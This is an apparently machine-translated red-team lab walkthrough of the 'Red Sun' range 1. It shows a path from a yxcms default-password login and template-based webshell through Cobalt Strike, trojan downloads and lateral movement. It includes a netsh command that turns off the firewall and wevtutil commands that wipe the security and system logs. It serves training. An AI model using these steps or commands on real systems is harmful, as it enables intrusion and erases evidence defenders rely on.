Red team attack and defense knowledge sharing - Red Sun security team shooting range 1 - Express version

This version is based on the penetration attack in daily actual combat , If you want to learn , It is suggested to study first edition
In daily site , The server will turn on 3389 port , So I'll open it all here first 3389 Port .

Internet Management

Port scanning

Through the scanning port web The site opens

Directory scanning
The database used is mysql And a backup file of a site
Get the site through file package splicing url：http://192.168.54.128/yxcms, The use of cms yes yxcms, Version is 1.2.1

know yxcms, Direct Baidu to find known vulnerabilities

Visit the site background , Try the default password admin,123456

Learned through Baidu , The function of editing foreground template can create new php file , Take... Directly webshell

Get path , Directly search the backup package for the existence of the foreground template php file , Then splice to get url：http://192.168.54.128/yxcms/protected/apps/default/view/default/info_search.php

webshell Connect

Turn off firewall

NetSh Advfirewall set allprofiles state off // Turn off firewall 

Post penetration

take cs go online

Grab the password

3389 Sign in

Intranet information collection

Collect Intranet Information （ Here steal a lazy , Not to mention the collection method , If you want to see it, you can see here [ Intranet information collection ]

Possible loopholes ：

• | ms08-067

Move horizontally

Now that you know that the domain administrator is administrator, So directly 3389 visit 192.168.52.138 and 192.168.52.141, The password follows web The password of the server is the same

Establish reverse connection tunnel

Listen Host Fill in the of the controlled intranet IP, Click on save

Generating Trojan files

Listener Select the monitor we just established reverse_tcp

Here we will generate a 64 and 32 Of payload（138 Yes. 64 position , and 141 yes 32 position ）, So we need to generate two Trojan files
Put these two files into the... Of the server we control web Site , Let them visit the site directly http://192.168.52.143/[ Trojan file name .exe] Download Trojan files
138:

141:

Open the Trojan file
Back to cs in , You can see that the two hosts have been online

Trace cleaning

wevtutil cl system  Clean up the system log 
wevtutil cl application  Clean up the application log 
wevtutil cl security  Clean up the security log 

Here I steal a lazy , It's not all cleaned up , But in actual combat, we should clean up all of them

Because it's express version , Some simplification has been made in many places , For example, it opens directly 3389 Function, etc , Just look at the music , If there is any mistake in the content, please point it out in your private letter or comment